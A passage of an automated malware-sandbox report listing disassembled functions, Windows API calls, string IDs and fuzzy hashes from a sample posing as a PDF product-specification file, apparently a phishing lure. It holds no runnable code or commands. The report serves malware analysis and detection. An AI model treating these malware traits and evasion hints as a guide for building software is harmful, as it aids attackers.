                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: #
                                                                                                                • API String ID: 0-1885708031
                                                                                                                • Opcode ID: 312910f2c2898d75404bdb6b493f4269da4b39ebd5dc457f71c1cd1dc64c1e65
                                                                                                                • Instruction ID: 239274f2fc9cea4c7259fd321dc2fdc84921f89d251b93730cf13d0c85137814
                                                                                                                • Opcode Fuzzy Hash: 312910f2c2898d75404bdb6b493f4269da4b39ebd5dc457f71c1cd1dc64c1e65
                                                                                                                • Instruction Fuzzy Hash: B6510075A04246EFDF19DFA8C4816FA7BE8FF65310F244059EC919B282D6309E46CBA1
                                                                                                                Function 00A5F291 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • Sleep.KERNEL32(00000000), ref: 00A5F2A2
                                                                                                                • GlobalMemoryStatusEx.KERNEL32(?), ref: 00A5F2BB
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: GlobalMemorySleepStatus
                                                                                                                • String ID: @
                                                                                                                • API String ID: 2783356886-2766056989
                                                                                                                • Opcode ID: f260e1ee4e0cebf051bdfe72b4de1c81bc0d3a6417b79ad66290c26a978f6e95
                                                                                                                • Instruction ID: 44bc672d3953551b8d969e2a3542fdf672962df08e20e09438b6cb0737acc2d5
                                                                                                                • Opcode Fuzzy Hash: f260e1ee4e0cebf051bdfe72b4de1c81bc0d3a6417b79ad66290c26a978f6e95
                                                                                                                • Instruction Fuzzy Hash: DD5143724097849BD320EF90D986BAFBBF8FBC4310F81885DF1D9411A5EB718529CB66
                                                                                                                Function 00AC5745 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 125COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • CharUpperBuffW.USER32(?,?,?,00000003,?,?), ref: 00AC57E0
                                                                                                                • _wcslen.LIBCMT ref: 00AC57EC
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: BuffCharUpper_wcslen
                                                                                                                • String ID: CALLARGARRAY
                                                                                                                • API String ID: 157775604-1150593374
                                                                                                                • Opcode ID: 12eb2c7099eceac3229beb62517dd6259b66afdd9444fb09d1a041444125e98f
                                                                                                                • Instruction ID: 151ebc4d157e9010f29e6273753c76b8a4d7c44046548d9938fffd9347cf0787
                                                                                                                • Opcode Fuzzy Hash: 12eb2c7099eceac3229beb62517dd6259b66afdd9444fb09d1a041444125e98f
                                                                                                                • Instruction Fuzzy Hash: 9E416A31E002099FCB14DFB8C981EAEBBB5EF59360B55406DF505A7291E730AD81DBA0
                                                                                                                Function 00ABD0F4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98networkCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • _wcslen.LIBCMT ref: 00ABD130
                                                                                                                • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00ABD13A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CrackInternet_wcslen
                                                                                                                • String ID: |
                                                                                                                • API String ID: 596671847-2343686810
                                                                                                                • Opcode ID: 75ae40be4c9bd76fa93508f48edd9316b55037d0db2dc24a91589e3e57c535b1
                                                                                                                • Instruction ID: 5cac73cecb235479203b8e34d5f60e8347ea3083eeaa5fd945e5012564e62a45
                                                                                                                • Opcode Fuzzy Hash: 75ae40be4c9bd76fa93508f48edd9316b55037d0db2dc24a91589e3e57c535b1
                                                                                                                • Instruction Fuzzy Hash: 1C315C75D00209ABCF15EFA4DD85AEEBFB9FF49300F000019F815A6162EB31AA06CB60
                                                                                                                Function 00AD356C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • DestroyWindow.USER32(?,?,?,?), ref: 00AD3621
                                                                                                                • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00AD365C
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$DestroyMove
                                                                                                                • String ID: static
                                                                                                                • API String ID: 2139405536-2160076837
                                                                                                                • Opcode ID: 8280c64c84e7df8c28c4de0f61427e3aa36ec0b6adb3c4159eb02e50be559dfe
                                                                                                                • Instruction ID: 111896f4fd008eb81af6a8ec493f48188208dc8b3d26000eb9ad24be8fc2a581
                                                                                                                • Opcode Fuzzy Hash: 8280c64c84e7df8c28c4de0f61427e3aa36ec0b6adb3c4159eb02e50be559dfe
                                                                                                                • Instruction Fuzzy Hash: 21319C72110604AEDB10DF68DC81EFB73A9FF88720F00961AF9A697280DB35ED81D761
                                                                                                                Function 00AD4537 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 00AD461F
                                                                                                                • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00AD4634
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend
                                                                                                                • String ID: '
                                                                                                                • API String ID: 3850602802-1997036262
                                                                                                                • Opcode ID: ebc0b89307b2d066ce430e4cf1d4268e3021f7672acd193b5ed7110d7729cc96
                                                                                                                • Instruction ID: 4bd5e213e26cdfa0a134c1a42b3cf053f95ba962104bc8f06548bf226b657479
                                                                                                                • Opcode Fuzzy Hash: ebc0b89307b2d066ce430e4cf1d4268e3021f7672acd193b5ed7110d7729cc96
                                                                                                                • Instruction Fuzzy Hash: 3E310574A0130A9FDB14CFA9D991BDABBB5FF49300F14406AE906AB391E770E941CF90
                                                                                                                Function 00AD31EF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00AD327C
                                                                                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00AD3287
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend
                                                                                                                • String ID: Combobox
                                                                                                                • API String ID: 3850602802-2096851135
                                                                                                                • Opcode ID: f3c178f4b1c4f4a2129232f217fb6414f2205fdf9baaf77284073b2222599d43
                                                                                                                • Instruction ID: 47ac489a47a80d9dd8226308ed6e9508b0d7cd751240c63da8cac996b4e08ca3
                                                                                                                • Opcode Fuzzy Hash: f3c178f4b1c4f4a2129232f217fb6414f2205fdf9baaf77284073b2222599d43
                                                                                                                • Instruction Fuzzy Hash: 9811E272B002087FEF219F94DC80EFB3B6AEBA4364F10412AF91A97390D6719D518760
                                                                                                                Function 00AD3710 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00A4600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00A4604C
                                                                                                                  • Part of subcall function 00A4600E: GetStockObject.GDI32(00000011), ref: 00A46060
                                                                                                                  • Part of subcall function 00A4600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 00A4606A
                                                                                                                • GetWindowRect.USER32(00000000,?), ref: 00AD377A
                                                                                                                • GetSysColor.USER32(00000012), ref: 00AD3794
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                                                • String ID: static
                                                                                                                • API String ID: 1983116058-2160076837
                                                                                                                • Opcode ID: 8d328fb7c7982a42415372a92c1f86ec4b69b5731c4c8e3594d564fc8db49fc8
                                                                                                                • Instruction ID: d37c17cd23fef5400d39731f6fd94775302b238cc1dcc22dd89376a87383e80d
                                                                                                                • Opcode Fuzzy Hash: 8d328fb7c7982a42415372a92c1f86ec4b69b5731c4c8e3594d564fc8db49fc8
                                                                                                                • Instruction Fuzzy Hash: E61129B261060AAFDF00DFA8CC46AEA7BB8FB08354F004916F956E3250D735E951DB60
                                                                                                                Function 00ABCD1E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66networkCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00ABCD7D
                                                                                                                • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00ABCDA6
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Internet$OpenOption
                                                                                                                • String ID: <local>
                                                                                                                • API String ID: 942729171-4266983199
                                                                                                                • Opcode ID: 4371f115b5cf3c287a1e8a95a445c4b3791a6408265d7681801a5d780944cccc
                                                                                                                • Instruction ID: dbf9ed41286e81de90151ae17ed62da07d7fc4fefcca22b8b4039319ba3d3229
                                                                                                                • Opcode Fuzzy Hash: 4371f115b5cf3c287a1e8a95a445c4b3791a6408265d7681801a5d780944cccc
                                                                                                                • Instruction Fuzzy Hash: 2311C279205632BAD7384B668C49EE7BFACEF527B4F40422AB14983092D7749941D6F0
                                                                                                                Function 00AD3429 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetWindowTextLengthW.USER32(00000000), ref: 00AD34AB
                                                                                                                • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00AD34BA
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: LengthMessageSendTextWindow
                                                                                                                • String ID: edit
                                                                                                                • API String ID: 2978978980-2167791130
                                                                                                                • Opcode ID: ef42ae1587cdce81f7d9f9ffa6b7e4f8889b31faa1a02db05d49a8b28a3bcbd7
                                                                                                                • Instruction ID: abff6e0994cfa51fa2e784cb680e245836a3a1da616b6712d366279154b53f96
                                                                                                                • Opcode Fuzzy Hash: ef42ae1587cdce81f7d9f9ffa6b7e4f8889b31faa1a02db05d49a8b28a3bcbd7
                                                                                                                • Instruction Fuzzy Hash: CF11BFB2100108AFEF118F64EC40AFB376AEB05775F508726F962932D0C779DD519752
                                                                                                                Function 00AA6C86 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00A49CB3: _wcslen.LIBCMT ref: 00A49CBD
                                                                                                                • CharUpperBuffW.USER32(?,?,?), ref: 00AA6CB6
                                                                                                                • _wcslen.LIBCMT ref: 00AA6CC2
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _wcslen$BuffCharUpper
                                                                                                                • String ID: STOP
                                                                                                                • API String ID: 1256254125-2411985666
                                                                                                                • Opcode ID: 0eef5e11c41d721ee508e27b5494e2d66027082828a4cdb66d1c209b06c1e678
                                                                                                                • Instruction ID: 9e6fa9fe745df65d847e78ff5883d3bff93f5a5699962a26cc4e5e494279ef8c
                                                                                                                • Opcode Fuzzy Hash: 0eef5e11c41d721ee508e27b5494e2d66027082828a4cdb66d1c209b06c1e678
                                                                                                                • Instruction Fuzzy Hash: 020126326009278BCB209FFDDD808BF37B4EFA67607050524E862931D5EB31D900CA50
                                                                                                                Function 00AA1CDE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00A49CB3: _wcslen.LIBCMT ref: 00A49CBD
                                                                                                                  • Part of subcall function 00AA3CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00AA3CCA
                                                                                                                • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00AA1D4C
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ClassMessageNameSend_wcslen
                                                                                                                • String ID: ComboBox$ListBox
                                                                                                                • API String ID: 624084870-1403004172
                                                                                                                • Opcode ID: 6f3b394fee60cb482ac7e9793284c2ce0d9db0ebcbd97fdaec61a1c7d7fd9b0a
                                                                                                                • Instruction ID: 39bf40f123895c925ca639b69465d7eeb2ddd954ca2abb71d672ab987ace3234
                                                                                                                • Opcode Fuzzy Hash: 6f3b394fee60cb482ac7e9793284c2ce0d9db0ebcbd97fdaec61a1c7d7fd9b0a
                                                                                                                • Instruction Fuzzy Hash: D701D879641218BBCF14EFA4CD55CFFB7A8EB47360F440619F832572D1EB3059188660
                                                                                                                Function 00AA1BD8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00A49CB3: _wcslen.LIBCMT ref: 00A49CBD
                                                                                                                  • Part of subcall function 00AA3CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00AA3CCA
                                                                                                                • SendMessageW.USER32(?,00000180,00000000,?), ref: 00AA1C46
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ClassMessageNameSend_wcslen
                                                                                                                • String ID: ComboBox$ListBox
                                                                                                                • API String ID: 624084870-1403004172
                                                                                                                • Opcode ID: d24f5d9dc11caf6a8c5453ec4b42a5b1a86f35d81194c0b2b9b47c643a1b4422
                                                                                                                • Instruction ID: 388266bd6a381fbbe4798715d722b289a53ba3a5ed10d88e0f82481b247f7ea5
                                                                                                                • Opcode Fuzzy Hash: d24f5d9dc11caf6a8c5453ec4b42a5b1a86f35d81194c0b2b9b47c643a1b4422
                                                                                                                • Instruction Fuzzy Hash: A601A775AC11087ACF14EF90CE519FF77A89B52360F140019B406672C2EB249E1CC6B1
                                                                                                                Function 00AA1C5C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00A49CB3: _wcslen.LIBCMT ref: 00A49CBD
                                                                                                                  • Part of subcall function 00AA3CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00AA3CCA
                                                                                                                • SendMessageW.USER32(?,00000182,?,00000000), ref: 00AA1CC8
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ClassMessageNameSend_wcslen
                                                                                                                • String ID: ComboBox$ListBox
                                                                                                                • API String ID: 624084870-1403004172
                                                                                                                • Opcode ID: 3f92868587bf09f85a23c3dce3132ecdb3683ffdef76e2ff28fea3c42ecd7292
                                                                                                                • Instruction ID: d36edd79c5fd49ab1388be96aa4607aebaa8288364c858c18266ada4c93e058e
                                                                                                                • Opcode Fuzzy Hash: 3f92868587bf09f85a23c3dce3132ecdb3683ffdef76e2ff28fea3c42ecd7292
                                                                                                                • Instruction Fuzzy Hash: EC01A275A811187ACF14EFA4CB41AFF77A89B12350F140416B802732C2EB219F29C6B2
                                                                                                                Function 00AA1D68 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00A49CB3: _wcslen.LIBCMT ref: 00A49CBD
                                                                                                                  • Part of subcall function 00AA3CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00AA3CCA
                                                                                                                • SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 00AA1DD3
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
